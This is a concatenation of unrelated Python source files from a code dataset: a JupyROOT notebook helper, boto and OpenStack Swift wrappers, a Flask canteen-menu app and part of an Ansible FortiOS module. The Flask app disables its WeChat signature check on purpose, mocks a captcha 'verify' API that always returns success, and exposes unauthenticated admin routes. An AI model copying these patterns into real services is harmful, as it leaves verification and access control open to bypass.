}
return pExtMap.get(thePlatform, '.so')
def welcomeMsg():
print("Welcome to JupyROOT %s" %ROOT.gROOT.GetVersion())
@contextmanager
def _setIgnoreLevel(level):
originalLevel = ROOT.gErrorIgnoreLevel
ROOT.gErrorIgnoreLevel = level
yield
ROOT.gErrorIgnoreLevel = originalLevel
def commentRemover( text ):
'''
>>> s="// hello"
>>> commentRemover(s)
''
>>> s="int /** Test **/ main() {return 0;}"
>>> commentRemover(s)
'int main() {return 0;}'
'''
def blotOutNonNewlines( strIn ) : # Return a string containing only the newline chars contained in strIn
return "" + ("\n" * strIn.count('\n'))
def replacer( match ) :
s = match.group(0)
if s.startswith('/'): # Matched string is //...EOL or /*...*/ ==> Blot out all non-newline chars
return blotOutNonNewlines(s)
else: # Matched string is '...' or "..." ==> Keep unchanged
return s
pattern = re.compile(\
r'//.*?$|/\*.*?\*/|\'(?:\\.|[^\\\'])*\'|"(?:\\.|[^\\"])*"',
re.DOTALL | re.MULTILINE)
return re.sub(pattern, replacer, text)
# Here functions are defined to process C++ code
def processCppCodeImpl(code):
#code = commentRemover(code)
ROOT.gInterpreter.ProcessLine(code)
def processMagicCppCodeImpl(code):
err = ROOT.ProcessLineWrapper(code)
if err == ROOT.TInterpreter.kProcessing:
ROOT.gInterpreter.ProcessLine('.@')
ROOT.gInterpreter.ProcessLine('cerr << "Unbalanced braces. This cell was not processed." << endl;')
def declareCppCodeImpl(code):
#code = commentRemover(code)
ROOT.gInterpreter.Declare(code)
def processCppCode(code):
processCppCodeImpl(code)
def processMagicCppCode(code):
processMagicCppCodeImpl(code)
def declareCppCode(code):
declareCppCodeImpl(code)
def _checkOutput(command,errMsg=None):
out = ""
try:
out = check_output(command.split())
except:
if errMsg:
sys.stderr.write("%s (command was %s)\n" %(errMsg,command))
return out
def _invokeAclicMac(fileName):
'''FIXME!
This function is a workaround. On osx, it is impossible to link against
libzmq.so, among the others. The error is known and is
"ld: can't link with bundle (MH_BUNDLE) only dylibs (MH_DYLIB)"
We cannot at the moment force Aclic to change the linker command in order
to exclude these libraries, so we launch a second root session to compile
the library, which we then load.
'''
command = 'root -l -q -b -e gSystem->CompileMacro(\"%s\",\"k\")*0'%fileName
out = _checkOutput(command, "Error ivoking ACLiC")
libNameBase = fileName.replace(".C","_C")
ROOT.gSystem.Load(libNameBase)
def _codeToFilename(code):
'''Convert code to a unique file name
>>> _codeToFilename("int f(i){return i*i;}")
'dbf7e731.C'
'''
fileNameBase = sha1(code.encode('utf-8')).hexdigest()[0:8]
return fileNameBase + ".C"
def _dumpToUniqueFile(code):
'''Dump code to file whose name is unique
>>> _codeToFilename("int f(i){return i*i;}")
'dbf7e731.C'
'''
fileName = _codeToFilename(code)
with open (fileName,'w') as ofile:
ofile.write(code)
return fileName
def isPlatformApple():
return _getPlatform() == 'darwin';
def invokeAclic(cell):
fileName = _dumpToUniqueFile(cell)
if isPlatformApple():
_invokeAclicMac(fileName)
else:
processCppCode(".L %s+" %fileName)
transformers = []
class StreamCapture(object):
def __init__(self, ip=get_ipython()):
# For the registration
self.shell = ip
self.ioHandler = handlers.IOHandler()
self.flag = True
self.outString = ""
self.errString = ""
self.asyncCapturer = handlers.Runner(self.syncCapture)
self.isFirstPreExecute = True
self.isFirstPostExecute = True
def syncCapture(self, defout = ''):
self.outString = defout
self.errString = defout
waitTimes = [.01, .01, .02, .04, .06, .08, .1]
lenWaitTimes = 7
iterIndex = 0
while self.flag:
self.ioHandler.Poll()
if not self.flag: return
waitTime = .1 if iterIndex >= lenWaitTimes else waitTimes[iterIndex]
time.sleep(waitTime)
def pre_execute(self):
if self.isFirstPreExecute:
self.isFirstPreExecute = False
return 0
self.flag = True
self.ioHandler.Clear()
self.ioHandler.InitCapture()
self.asyncCapturer.AsyncRun('')
def post_execute(self):
if self.isFirstPostExecute:
self.isFirstPostExecute = False
self.isFirstPreExecute = False
return 0
self.flag = False
self.asyncCapturer.Wait()
self.ioHandler.Poll()
self.ioHandler.EndCapture()
# Print for the notebook
out = self.ioHandler.GetStdout()
err = self.ioHandler.GetStderr()
if not transformers:
sys.stdout.write(out)
sys.stderr.write(err)
else:
for t in transformers:
(out, err, otype) = t(out, err)
if otype == 'html':
IPython.display.display(HTML(out))
IPython.display.display(HTML(err))
return 0
def register(self):
self.shell.events.register('pre_execute', self.pre_execute)
self.shell.events.register('post_execute', self.post_execute)
def GetCanvasDrawers():
lOfC = ROOT.gROOT.GetListOfCanvases()
return [NotebookDrawer(can) for can in lOfC if can.IsDrawn()]
def GetGeometryDrawer():
if not hasattr(ROOT,'gGeoManager'): return
if not ROOT.gGeoManager: return
if not ROOT.gGeoManager.GetUserPaintVolume(): return
vol = ROOT.gGeoManager.GetTopVolume()
if vol:
return NotebookDrawer(vol)
def GetDrawers():
drawers = GetCanvasDrawers()
geometryDrawer = GetGeometryDrawer()
if geometryDrawer: drawers.append(geometryDrawer)
return drawers
def DrawGeometry():
drawer = GetGeometryDrawer()
if drawer:
drawer.Draw()
def DrawCanvases():
drawers = GetCanvasDrawers()
for drawer in drawers:
drawer.Draw()
def NotebookDraw():
DrawGeometry()
DrawCanvases()
class CaptureDrawnPrimitives(object):
'''
Capture the canvas which is drawn to display it.
'''
def __init__(self, ip=get_ipython()):
self.shell = ip
def _post_execute(self):
NotebookDraw()
def register(self):
self.shell.events.register('post_execute', self._post_execute)
class NotebookDrawer(object):
'''
Capture the canvas which is drawn and decide if it should be displayed using
jsROOT.
'''
jsUID = 0
def __init__(self, theObject):
self.drawableObject = theObject
self.isCanvas = self.drawableObject.ClassName() == "TCanvas"
def __del__(self):
if self.isCanvas:
self.drawableObject.ResetDrawn()
else:
ROOT.gGeoManager.SetUserPaintVolume(None)
def _getListOfPrimitivesNamesAndTypes(self):
"""
Get the list of primitives in the pad, recursively descending into
histograms and graphs looking for fitted functions.
"""
primitives = self.drawableObject.GetListOfPrimitives()
primitivesNames = map(lambda p: p.ClassName(), primitives)
return sorted(primitivesNames)
def _getUID(self):
'''
Every DIV containing a JavaScript snippet must be unique in the
notebook. This methods provides a unique identifier.
'''
NotebookDrawer.jsUID += 1
return NotebookDrawer.jsUID
def _canJsDisplay(self):
if not TBufferJSONAvailable():
return False
if not self.isCanvas: return True
# to be optimised
if not _enableJSVis: return False
primitivesTypesNames = self._getListOfPrimitivesNamesAndTypes()
for unsupportedPattern in _jsNotDrawableClassesPatterns:
for primitiveTypeName in primitivesTypesNames:
if fnmatch.fnmatch(primitiveTypeName,unsupportedPattern):
print("The canvas contains an object of a type jsROOT cannot currently handle (%s). Falling back to a static png." %primitiveTypeName, file=sys.stderr)
return False
return True
def _getJsCode(self):
# Workaround to have ConvertToJSON work
json = ROOT.TBufferJSON.ConvertToJSON(self.drawableObject, 3)
# Here we could optimise the string manipulation
divId = 'root_plot_' + str(self._getUID())
height = _jsCanvasHeight
width = _jsCanvasHeight
options = "all"
if self.isCanvas:
height = self.drawableObject.GetWw()
width = self.drawableObject.GetWh()
options = ""
thisJsCode = _jsCode.format(jsCanvasWidth = height,
jsCanvasHeight = width,
jsROOTSourceDir = _jsROOTSourceDir,
jsonContent = json.Data(),
jsDrawOptions = options,
jsDivId = divId)
return thisJsCode
def _getJsDiv(self):
return HTML(self._getJsCode())
def _jsDisplay(self):
IPython.display.display(self._getJsDiv())
return 0
def _getPngImage(self):
ofile = tempfile.NamedTemporaryFile(suffix=".png")
with _setIgnoreLevel(ROOT.kError):
self.drawableObject.SaveAs(ofile.name)
img = IPython.display.Image(filename=ofile.name, format='png', embed=True)
return img
def _pngDisplay(self):
img = self._getPngImage()
IPython.display.display(img)
def _display(self):
if _enableJSVisDebug:
self._pngDisplay()
self._jsDisplay()
else:
if self._canJsDisplay():
self._jsDisplay()
else:
self._pngDisplay()
def GetDrawableObjects(self):
if not self.isCanvas:
return [self._getJsDiv()]
if _enableJSVisDebug:
return [self._getJsDiv(),self._getPngImage()]
if self._canJsDisplay():
return [self._getJsDiv()]
else:
return [self._getPngImage()]
def Draw(self):
self._display()
return 0
def setStyle():
style=ROOT.gStyle
style.SetFuncWidth(2)
captures = []
def loadMagicsAndCapturers():
global captures
extNames = ["JupyROOT.magics." + name for name in ["cppmagic","jsrootmagic"]]
ip = get_ipython()
extMgr = ExtensionManager(ip)
for extName in extNames:
extMgr.load_extension(extName)
captures.append(StreamCapture())
captures.append(CaptureDrawnPrimitives())
for capture in captures: capture.register()
def declareProcessLineWrapper():
ROOT.gInterpreter.Declare("""
TInterpreter::EErrorCode ProcessLineWrapper(const char* line) {
TInterpreter::EErrorCode err;
gInterpreter->ProcessLine(line, &err);
return err;
}
""")
def enhanceROOTModule():
ROOT.enableJSVis = enableJSVis
ROOT.disableJSVis = disableJSVis
ROOT.enableJSVisDebug = enableJSVisDebug
ROOT.disableJSVisDebug = disableJSVisDebug
def enableCppHighlighting():
ipDispJs = IPython.display.display_javascript
# Define highlight mode for %%cpp magic
ipDispJs(_jsMagicHighlight.format(cppMIME = cppMIME), raw=True)
def iPythonize():
setStyle()
loadMagicsAndCapturers()
declareProcessLineWrapper()
#enableCppHighlighting()
enhanceROOTModule()
welcomeMsg()
| lgpl-2.1 | -7,166,167,120,123,723,000 | 27.619329 | 171 | 0.627154 | false |
IsCoolEntertainment/debpkg_python-boto | boto/ec2/elb/securitygroup.py | 57 | 1576 | # Copyright (c) 2010 Reza Lotun http://reza.lotun.name
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class SecurityGroup(object):
def __init__(self, connection=None):
self.name = None
self.owner_alias = None
def __repr__(self):
return 'SecurityGroup(%s, %s)' % (self.name, self.owner_alias)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'GroupName':
self.name = value
elif name == 'OwnerAlias':
self.owner_alias = value
| mit | -3,766,237,517,782,144,500 | 40.473684 | 74 | 0.712563 | false |
eoncloud-dev/eonboard | eoncloud_web/cloud/api/swift.py | 10 | 11697 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import six.moves.urllib.parse as urlparse
import swiftclient
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon.utils.memoized import memoized # noqa
from openstack_dashboard.api import base
from openstack_dashboard.openstack.common import timeutils
LOG = logging.getLogger(__name__)
FOLDER_DELIMITER = "/"
# Swift ACL
GLOBAL_READ_ACL = ".r:*"
LIST_CONTENTS_ACL = ".rlistings"
class Container(base.APIDictWrapper):
pass
class StorageObject(base.APIDictWrapper):
def __init__(self, apidict, container_name, orig_name=None, data=None):
super(StorageObject, self).__init__(apidict)
self.container_name = container_name
self.orig_name = orig_name
self.data = data
@property
def id(self):
return self.name
class PseudoFolder(base.APIDictWrapper):
def __init__(self, apidict, container_name):
super(PseudoFolder, self).__init__(apidict)
self.container_name = container_name
@property
def id(self):
return '%s/%s' % (self.container_name, self.name)
@property
def name(self):
return self.subdir.rstrip(FOLDER_DELIMITER)
@property
def bytes(self):
return None
@property
def content_type(self):
return "application/pseudo-folder"
def _objectify(items, container_name):
"""Splits a listing of objects into their appropriate wrapper classes."""
objects = []
# Deal with objects and object pseudo-folders first, save subdirs for later
for item in items:
if item.get("subdir", None) is not None:
object_cls = PseudoFolder
else:
object_cls = StorageObject
objects.append(object_cls(item, container_name))
return objects
def _metadata_to_header(metadata):
headers = {}
public = metadata.get('is_public')
if public is True:
public_container_acls = [GLOBAL_READ_ACL, LIST_CONTENTS_ACL]
headers['x-container-read'] = ",".join(public_container_acls)
elif public is False:
headers['x-container-read'] = ""
return headers
@memoized
def swift_api(request):
endpoint = base.url_for(request, 'object-store')
cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
LOG.debug('Swift connection created using token "%s" and url "%s"'
% (request.user.token.id, endpoint))
return swiftclient.client.Connection(None,
request.user.username,
None,
preauthtoken=request.user.token.id,
preauthurl=endpoint,
cacert=cacert,
insecure=insecure,
auth_version="2.0")
def swift_container_exists(request, container_name):
try:
swift_api(request).head_container(container_name)
return True
except swiftclient.client.ClientException:
return False
def swift_object_exists(request, container_name, object_name):
try:
swift_api(request).head_object(container_name, object_name)
return True
except swiftclient.client.ClientException:
return False
def swift_get_containers(request, marker=None):
limit = getattr(settings, 'API_RESULT_LIMIT', 1000)
headers, containers = swift_api(request).get_account(limit=limit + 1,
marker=marker,
full_listing=True)
container_objs = [Container(c) for c in containers]
if(len(container_objs) > limit):
return (container_objs[0:-1], True)
else:
return (container_objs, False)
def swift_get_container(request, container_name, with_data=True):
if with_data:
headers, data = swift_api(request).get_object(container_name, "")
else:
data = None
headers = swift_api(request).head_container(container_name)
timestamp = None
is_public = False
public_url = None
try:
is_public = GLOBAL_READ_ACL in headers.get('x-container-read', '')
if is_public:
swift_endpoint = base.url_for(request,
'object-store',
endpoint_type='publicURL')
public_url = swift_endpoint + '/' + urlparse.quote(container_name)
ts_float = float(headers.get('x-timestamp'))
timestamp = timeutils.iso8601_from_timestamp(ts_float)
except Exception:
pass
container_info = {
'name': container_name,
'container_object_count': headers.get('x-container-object-count'),
'container_bytes_used': headers.get('x-container-bytes-used'),
'timestamp': timestamp,
'data': data,
'is_public': is_public,
'public_url': public_url,
}
return Container(container_info)
def swift_create_container(request, name, metadata=({})):
if swift_container_exists(request, name):
raise exceptions.AlreadyExists(name, 'container')
headers = _metadata_to_header(metadata)
swift_api(request).put_container(name, headers=headers)
return Container({'name': name})
def swift_update_container(request, name, metadata=({})):
headers = _metadata_to_header(metadata)
swift_api(request).post_container(name, headers=headers)
return Container({'name': name})
def swift_delete_container(request, name):
# It cannot be deleted if it's not empty. The batch remove of objects
# be done in swiftclient instead of Horizon.
objects, more = swift_get_objects(request, name)
if objects:
error_msg = unicode(_("The container cannot be deleted "
"since it's not empty."))
exc = exceptions.Conflict(error_msg)
exc._safe_message = error_msg
raise exc
swift_api(request).delete_container(name)
return True
def swift_get_objects(request, container_name, prefix=None, marker=None,
limit=None):
limit = limit or getattr(settings, 'API_RESULT_LIMIT', 1000)
kwargs = dict(prefix=prefix,
marker=marker,
limit=limit + 1,
delimiter=FOLDER_DELIMITER,
full_listing=True)
headers, objects = swift_api(request).get_container(container_name,
**kwargs)
object_objs = _objectify(objects, container_name)
if(len(object_objs) > limit):
return (object_objs[0:-1], True)
else:
return (object_objs, False)
def swift_filter_objects(request, filter_string, container_name, prefix=None,
marker=None):
# FIXME(kewu): Swift currently has no real filtering API, thus the marker
# parameter here won't actually help the pagination. For now I am just
# getting the largest number of objects from a container and filtering
# based on those objects.
limit = 9999
objects = swift_get_objects(request,
container_name,
prefix=prefix,
marker=marker,
limit=limit)
filter_string_list = filter_string.lower().strip().split(' ')
def matches_filter(obj):
for q in filter_string_list:
return wildcard_search(obj.name.lower(), q)
return filter(matches_filter, objects[0])
def wildcard_search(string, q):
q_list = q.split('*')
if all(map(lambda x: x == '', q_list)):
return True
elif q_list[0] not in string:
return False
else:
if q_list[0] == '':
tail = string
else:
head, delimiter, tail = string.partition(q_list[0])
return wildcard_search(tail, '*'.join(q_list[1:]))
def swift_copy_object(request, orig_container_name, orig_object_name,
new_container_name, new_object_name):
if swift_object_exists(request, new_container_name, new_object_name):
raise exceptions.AlreadyExists(new_object_name, 'object')
headers = {"X-Copy-From": FOLDER_DELIMITER.join([orig_container_name,
orig_object_name])}
return swift_api(request).put_object(new_container_name,
new_object_name,
None,
headers=headers)
def swift_upload_object(request, container_name, object_name,
object_file=None):
headers = {}
size = 0
if object_file:
headers['X-Object-Meta-Orig-Filename'] = object_file.name
size = object_file.size
etag = swift_api(request).put_object(container_name,
object_name,
object_file,
headers=headers)
obj_info = {'name': object_name, 'bytes': size, 'etag': etag}
return StorageObject(obj_info, container_name)
def swift_create_pseudo_folder(request, container_name, pseudo_folder_name):
headers = {}
etag = swift_api(request).put_object(container_name,
pseudo_folder_name,
None,
headers=headers)
obj_info = {
'name': pseudo_folder_name,
'etag': etag
}
return PseudoFolder(obj_info, container_name)
def swift_delete_object(request, container_name, object_name):
swift_api(request).delete_object(container_name, object_name)
return True
def swift_get_object(request, container_name, object_name, with_data=True):
if with_data:
headers, data = swift_api(request).get_object(container_name,
object_name)
else:
data = None
headers = swift_api(request).head_object(container_name,
object_name)
orig_name = headers.get("x-object-meta-orig-filename")
timestamp = None
try:
ts_float = float(headers.get('x-timestamp'))
timestamp = timeutils.iso8601_from_timestamp(ts_float)
except Exception:
pass
obj_info = {
'name': object_name,
'bytes': headers.get('content-length'),
'content_type': headers.get('content-type'),
'etag': headers.get('etag'),
'timestamp': timestamp,
}
return StorageObject(obj_info,
container_name,
orig_name=orig_name,
data=data)
| apache-2.0 | 1,103,970,919,797,390,500 | 33.402941 | 79 | 0.589553 | false |
arcsun/neteaseMenu | start.py | 1 | 11671 | #coding=utf-8
from flask import Flask, redirect, render_template, request, Response
from codepy import menulog
import anydbm as dbm
import shelve
import os, sys
import urllib
from datetime import datetime
import time
import urllib2
import hashlib
app = Flask(__name__)
visit = 0
visitHome = 0
startTime = time.time()
token = 'hzsunzhengyu' # 微信公众号的token,自行设置
cache = {}
s = None
def checkSign(signature, timestamp, nonce):
# 微信签名
args = []
args.append("token=%s" % token)
args.append("timestamp=%s" % timestamp)
args.append("nonce=%s" % nonce)
args = sorted(args)
raw = "&".join(args)
sign = hashlib.sha1(raw).hexdigest()
menulog.info(signature)
menulog.info(sign)
return signature == sign
def saveCache(key, content):
"""
现在需要服务器中转才能访问,做个简单的缓存
"""
if len(cache) >= 10:
cache.clear()
cache[key] = content
def addOne(page= 1):
"""访问计数"""
try:
if not s:
globals()['s'] = shelve.open('visit_count.dat', writeback=True)
if page == 0:
s['count_home'] = 0 if s.get('count_home') is None else s['count_home']+1
elif page == 1:
s['count_menu'] = 0 if s.get('count_menu') is None else s['count_menu']+1
s.sync()
except Exception as e:
menulog.debug(e)
@app.route('/menu/cache')
def getCache():
return str(cache.keys())
def getWebContent(url):
try:
fname = url.split('?')[1].replace('=', '_')
if cache.get(fname):
return cache.get(fname)
else:
req = urllib2.Request(url+ '&companyId=1') # update:增加了这个参数
req.add_header('User-Agent', 'Mozilla/5.0 (Linux; Android 6.0; PRO 6 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.130 Mobile Safari/537.36 YiXin/4.8.3')
res = urllib2.urlopen(req)
html = res.read().decode('utf-8')
saveCache(fname, html)
return html
except Exception as e:
menulog.debug(str(e))
return ''
@app.route('/')
def hello_world():
return redirect('/menu')
@app.route('/menus/sign')
def weixin_sign():
# 微信配置认证
menulog.info('weixin sign')
signature = request.args.get('signature', '')
timestamp = request.args.get('timestamp', '')
nonce = request.args.get('nonce', '')
echostr = request.args.get('echostr', '')
valid = checkSign(signature, timestamp, nonce)
if valid:
return echostr
else:
# 目前签名有bug,暂都返回成功
return echostr
@app.route('/menu/<int:day>', methods = ['GET', 'POST'])
def menu(day=0):
# 0今天, 1明天, 151202指定日期
if request.method == 'POST':
day = int(request.form['day'])
# update:现在易信增加了对User-Agent的限制,必须使用中转的接口了
return redirect('/menus/%s'% day)
# from codepy import menu
# globals()['visit'] += 1
# menulog.info(u'访问菜单@%s'% visit)
# url = menu.Menu(day).process()
# if url.startswith('http'):
# return redirect(url)
# else:
# return url
@app.route('/menus/<int:day>', methods = ['GET', 'POST'])
def menus(day=0):
# 为解决微信内跳转卡住的问题, 增加这个方法
# 服务器从易信读取网页信息后再返回给用户
from codepy import menu
if request.method == 'POST':
day = int(request.form['day'])
addOne(1)
globals()['visit'] += 1
menulog.info(u'访问菜单@%s'% visit)
url = menu.Menu(day).process()
if url.startswith('http'):
return getWebContent(url)
else:
return url
@app.route('/menus/bus')
def bus():
# 班车路线页, 中转一下
addOne(1)
globals()['visit'] += 1
menulog.info(u'访问菜单@%s'% visit)
url = "http://numenplus.yixin.im/multiNewsWap.do?multiNewsId=17011" # 更新周期很长,暂手动更新
try:
return getWebContent(url)
except:
return u'网页访问出错'
def getWeekDayFromDay(daytime):
"""根据日期(如20160517)计算是星期几"""
try:
daytime = '20'+ str(daytime) # '20160517'
year = int(daytime[:4]) # 2016
month = int(daytime[4:6]) # 5
day = int(daytime[6:8]) # 17
weekday = datetime(year, month, day, 0, 0, 0, 0).weekday()
weekdaynames= {
0: u'星期一',
1: u'星期二',
2: u'星期三',
3: u'星期四',
4: u'星期五',
5: u'星期六',
6: u'星期日',
}
return weekdaynames.get(weekday, u'')
except:
menulog.debug(u'获取星期几错误')
return u''
@app.route('/menu')
def menuList():
addOne(0)
globals()['visitHome'] += 1
menulog.info(u'访问主页@%s'% visitHome)
try:
db = dbm.open('datafile', 'c')
cache = eval(db['cache'])
future = eval(db['future'])
maybe = eval(db['maybe'])
maybe.sort()
vals = {}
for day in future:
vals[day] = cache[day]
db.close()
weekdays = {}
for day in vals.keys():
weekdays[day] = getWeekDayFromDay(day)
return render_template('menu.html', vals= vals, days= future, weekdays= weekdays, maybe= maybe, total=(s.get('count_menu'), s.get('count_home')))
except (IOError, KeyError):
msg = u'缓存读取错误'
menulog.info(msg)
return msg
@app.route('/menu/manage/hzmenu')
def manage():
seconds = int(time.time()- startTime)
days = seconds/(24*60*60)
if days >= 1:
seconds -= 24*60*60*days
hours = seconds/(60*60)
if hours >= 1:
seconds -= 60*60*hours
miniutes = seconds/60
if miniutes >= 1:
seconds -= 60*miniutes
timestr = u'本次已运行:%s天%s小时%s分钟%s秒'% (days, hours, miniutes, seconds)
return render_template('manage.html', visit= visit, visitHome= visitHome, timestr= timestr, total=(s.get('count_menu'), s.get('count_home')))
@app.route('/menu/info')
def info():
try:
db = dbm.open('datafile', 'r')
msg = str(db)
db.close()
return msg
except (IOError, KeyError):
return u'缓存读取错误'
@app.route('/menu/delete/<int:day>', methods = ['GET', 'POST'])
def delete(day= 150101):
try:
db = dbm.open('datafile', 'w')
if request.method == 'POST':
day = int(request.form['day'])
cache = eval(db['cache'])
if cache.has_key(day):
del cache[day]
msg = u'删除%s'% day
else:
msg = u'del key not found'
menulog.info(msg)
db['cache'] = str(cache)
db.close()
return msg
except (IOError, KeyError):
return u'缓存读取错误'
@app.route('/menu/delfuture/<int:day>', methods = ['GET', 'POST'])
def delfuture(day= 161300):
try:
db = dbm.open('datafile', 'w')
if request.method == 'POST':
day = int(request.form['day'])
future = eval(db['future'])
if day in future:
future.remove(day)
msg = u'删除%s'% day
else:
msg = u'del key not found'
menulog.info(msg)
db['future'] = str(future)
db.close()
delete(day)
return msg
except (IOError, KeyError) as e:
print e
return u'缓存读取错误'
@app.route('/menu/refreshlist')
def refreshlist():
try:
db = dbm.open('datafile', 'w')
cache = eval(db['cache'])
future = []
today = int(time.strftime('%y%m%d',time.localtime(time.time())))
for day in cache.keys():
if day >= today:
future.append(day)
future.sort()
db['future'] = str(future)
msg = u'更新%s后已找到的菜单列表 from homepage'% today
menulog.info(msg)
db.close()
return msg
except (IOError, KeyError):
return u'缓存读取错误'
@app.route('/menu/clear')
def clearMaybe():
# 清空可能的菜单(maybe=[])
try:
db = dbm.open('datafile', 'w')
db['maybe'] = '[]'
db.close()
msg = u'清空maybe'
menulog.info(msg)
return msg
except (IOError, KeyError):
msg = u'缓存读取错误'
menulog.info(msg)
return msg
@app.route('/menu/start/<int:startid>', methods = ['GET', 'POST'])
def start(startid= 17000):
# 设置起始查找点为指定值
try:
if request.method == 'POST':
startid = int(request.form['startid'])
db = dbm.open('datafile', 'w')
db['startId'] = str(startid)
db.close()
msg = u'设置查找起点ID为:%d'% startid
menulog.info(msg)
return msg
except (IOError, KeyError):
msg = u'缓存/POST参数读取错误'
menulog.info(msg)
return msg
@app.route('/menu/add/<int:day>/<int:mid>', methods = ['GET', 'POST'])
def add(day= 151203, mid= 17063):
# 手动添加一个菜单(偶尔发布者会填错日期)
try:
db = dbm.open('datafile', 'w')
cache = eval(db['cache'])
if request.method == 'POST':
day = int(request.form['day'])
mid = int(request.form['mid'])
cache[day] = mid
db['cache'] = str(cache)
msg = u'更新%s的菜单id为%s'% (day, mid)
menulog.info(msg)
db.close()
return msg
except (IOError, KeyError):
msg = u'缓存/POST参数读取错误'
menulog.info(msg)
return msg
@app.route('/menu/log/<int:lines>')
def readLog(lines= 0):
# 读取多少行log, 0为全部
f = None
try:
files = os.listdir('./')
files.sort()
logs = []
for fname in files:
if fname.startswith('menu.log'):
logs.append(fname)
if logs:
f = open(logs[-1])
contents = f.readlines()
content = ''
if lines == 0:
lines = len(contents)
line = 0
for msg in reversed(contents):
line += 1
if line < lines:
content += msg+ '<br>'
else:
break
return content.decode('utf-8')
else:
return u'暂无日志'
except IOError:
return '读取日志出错'
finally:
if f:
f.close()
@app.route('/api/v1/verify', methods=['POST', 'GET'])
def mockYidun():
resp = Response('{"msg":"success","result":true,"c":1,"error":0}')
resp.headers['Content-Type'] = 'application/json;charset=UTF-8'
return resp
@app.route('/api/v2/verify', methods=['POST', 'GET'])
def mockYidun2():
resp = Response('{"msg":"success","result":true,"c":1,"error":0}')
resp.headers['Content-Type'] = 'application/json;charset=UTF-8'
return resp
if __name__ == '__main__':
if sys.platform.startswith('win'):
# 本地调试
# import webbrowser
# webbrowser.open('http://127.0.0.1:80/menu')
app.run(host='127.0.0.1', port= 80, debug= True)
elif len(sys.argv)> 1:
# 线上调试, 随便传个参数
app.run(host='0.0.0.0', port= 5000, debug= True)
else:
# 线上正式版本, 用gunicorn启动
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
app.run(host='0.0.0.0', port= 5000)
| apache-2.0 | -3,355,608,342,837,316,600 | 25.896296 | 205 | 0.541357 | false |
gregdek/ansible | lib/ansible/modules/network/fortios/fortios_firewall_address.py | 7 | 15896 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2018 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# the lib use python logging can get it if the following is set in your
# Ansible config.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_address
short_description: Configure IPv4 addresses.
description:
- This module is able to configure a FortiGate or FortiOS by
allowing the user to configure firewall feature and address category.
Examples includes all options and need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip adress.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: false
firewall_address:
description:
- Configure IPv4 addresses.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
allow-routing:
description:
- Enable/disable use of this address in the static route configuration.
choices:
- enable
- disable
associated-interface:
description:
- Network interface associated with address. Source system.interface.name system.zone.name.
cache-ttl:
description:
- Defines the minimal TTL of individual IP addresses in FQDN cache measured in seconds.
color:
description:
- Color of icon on the GUI.
comment:
description:
- Comment.
country:
description:
- IP addresses associated to a specific country.
end-ip:
description:
- Final IP address (inclusive) in the range for the address.
epg-name:
description:
- Endpoint group name.
filter:
description:
- Match criteria filter.
fqdn:
description:
- Fully Qualified Domain Name address.
list:
description:
- IP address list.
suboptions:
ip:
description:
- IP.
required: true
name:
description:
- Address name.
required: true
obj-id:
description:
- Object ID for NSX.
organization:
description:
- "Organization domain name (Syntax: organization/domain)."
policy-group:
description:
- Policy group name.
sdn:
description:
- SDN.
choices:
- aci
- aws
- azure
- gcp
- nsx
- nuage
- oci
sdn-tag:
description:
- SDN Tag.
start-ip:
description:
